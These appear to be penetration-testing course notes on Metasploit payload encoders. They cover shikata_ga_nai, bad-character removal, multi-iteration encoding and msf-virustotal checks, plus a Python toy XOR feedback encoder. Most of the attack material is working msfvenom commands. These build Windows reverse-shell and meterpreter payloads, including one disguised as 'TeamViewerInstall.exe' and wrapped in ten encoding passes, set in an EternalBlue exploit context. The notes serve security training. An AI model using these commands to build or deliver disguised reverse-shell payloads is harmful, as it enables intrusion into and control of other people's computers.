Encoders
About
Encoders serve two purposes: they help with AV evasion, and they keep a payload compatible with the target process by removing "bad characters", byte values the vulnerable program will not accept or will mangle (a null byte that terminates a C string, or 0x0a/0x0d that end a line in a text protocol). The encoder transforms the payload into bytes that avoid those values and prepends a small decoder stub that restores the original in memory at run time, so the payload stays both "hidden" and functional.
One of the most used encoders is Shikata Ga Nai (SGN), Japanese for "nothing can be done about it", a polymorphic XOR additive feedback encoder for x86 that msfvenom usually picks automatically when you pass -b. It is not really the best option for evasion anymore, since most AV engines recognise its decoder stub, but it is still the go-to for bad-character removal and is worth understanding; see the blog post on it.
Using Encoders
Non-Encoded Payload
[!bash!]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f perl
Encoded Payload
Bad characters are passed to -b as escaped bytes; '\x00\x0a\x0d' (NUL, LF, CR) is the usual example. Passing -b on its own already makes msfvenom pick a compatible encoder by rank, so -e is only needed to force a specific one:
[!bash!]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b '\x00\x0a\x0d' -f perl -e x86/shikata_ga_nai
Comparing the two outputs shows the decoder stub prepended in front of the (now different) payload bytes.
Encoding a selected payload
From inside msfconsole, pick the payload by its index from show payloads, then list the encoders compatible with it:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15
msf6 exploit(windows/smb/ms17_010_eternalblue) > show encoders
# One single iteration, with the encoder name taken from the show encoders output (e.g. x86/shikata_ga_nai)
[!bash!]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacking-ip> LPORT=8080 -e <encoder-from-show-encoders> -f exe -o ./TeamViewerInstall.exe
# Multiple encoding iterations: -i 10 runs the encoder ten times, each pass adding its own decoder stub, so the binary grows and the innermost payload ends up wrapped in ten stubs
[!bash!]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacking-ip> LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe
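What -b and -i actually ask the encoder to do, as an added example that is not from the original notes or from Metasploit's own code: a byte-wise XOR additive-feedback scheme (the family shikata_ga_nai belongs to, heavily simplified: no decoder stub, single-byte key, deterministic key search instead of SGN's random one), a bad-character scanner, and stacked iterations. The bad-character list and the eight-byte sample are constructed for the demo; the sample merely looks like x86 and is not working shellcode.

```python
"""
Added example, not from the original notes or from Metasploit: a
byte-wise XOR additive-feedback encoder reduced to the minimum needed
to show what `-b` (avoid bad bytes) and `-i` (stacked passes) do.
"""
from typing import List, Optional, Tuple

# Constructed bad-character list: NUL, LF, CR (what -b '\x00\x0a\x0d' excludes).
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed sample: x86-looking bytes containing every bad char above.
# It is NOT working shellcode, just input for the demo.
SAMPLE = b"\x31\xc0\x50\x68\x0a\x0d\x00\x90"


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> List[Tuple[int, int]]:
    """Return (offset, value) for every byte of data that is in bad."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def xor_feedback_encode(payload: bytes, key: int) -> bytes:
    """Encode one byte at a time: c = p ^ key, then key = (key + c) mod 256.
    The feedback uses the ciphertext byte, so the decoder can recompute it."""
    out = bytearray()
    k = key & 0xFF
    for p in payload:
        c = p ^ k
        out.append(c)
        k = (k + c) & 0xFF
    return bytes(out)


def xor_feedback_decode(encoded: bytes, key: int) -> bytes:
    """Inverse of xor_feedback_encode; this is what a decoder stub does in memory."""
    out = bytearray()
    k = key & 0xFF
    for c in encoded:
        out.append(c ^ k)
        k = (k + c) & 0xFF
    return bytes(out)


def encode_avoiding(payload: bytes, bad: bytes = BAD_CHARS,
                    candidates=range(1, 256)) -> Optional[Tuple[int, bytes]]:
    """Pick the first key whose output contains no bad byte (what -b asks for).
    Real encoders try random keys so each build differs; a fixed order keeps
    this demo reproducible. Returns None if no single-byte key works."""
    for key in candidates:
        enc = xor_feedback_encode(payload, key)
        if not find_bad_chars(enc, bad):
            return key, enc
    return None


def encode_iterations(payload: bytes, iterations: int,
                      bad: bytes = BAD_CHARS) -> Tuple[List[int], bytes]:
    """Apply the encoder `iterations` times, like msfvenom -i N. Each pass gets
    its own key; the real tool also prepends a decoder stub per pass, which is
    why the output grows and why stacked passes do not hide the stub itself."""
    keys: List[int] = []
    data = payload
    for _ in range(iterations):
        result = encode_avoiding(data, bad)
        if result is None:
            raise ValueError("no single-byte key avoids the bad characters for this pass")
        key, data = result
        keys.append(key)
    return keys, data


def decode_iterations(keys: List[int], data: bytes) -> bytes:
    """Undo encode_iterations: the last pass applied is decoded first."""
    for key in reversed(keys):
        data = xor_feedback_decode(data, key)
    return data


if __name__ == "__main__":
    print("bad chars in sample:", find_bad_chars(SAMPLE))
    key, enc = encode_avoiding(SAMPLE)
    print(f"key=0x{key:02x} encoded={enc.hex()} bad={find_bad_chars(enc)}")
    keys, enc3 = encode_iterations(SAMPLE, 3)
    print("3 iterations, keys:", keys, "roundtrip ok:",
          decode_iterations(keys, enc3) == SAMPLE)
```

Two things the toy leaves out matter in practice: the decoder stub that a real encoder prepends must itself be free of the bad characters (SGN solves that with its FPU-based stub and register tricks), and that stub is exactly what AV signatures match, so running ten passes only wraps a known stub around another known stub.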
MSF - VirusTotal
Keep in mind that even with an encoder and several iterations, the payload above is still flagged by most AV solutions: encoders were written for bad-character removal, not for evasion, and their decoder stubs are well known. Metasploit ships msf-virustotal to check a sample against VirusTotal (it needs a VirusTotal API key). Caveat: every sample you upload is shared with AV vendors, so only check throwaway builds, never a payload you intend to use on an engagement.
[!bash!]$ msf-virustotal -k <API key> -f TeamViewerInstall.exe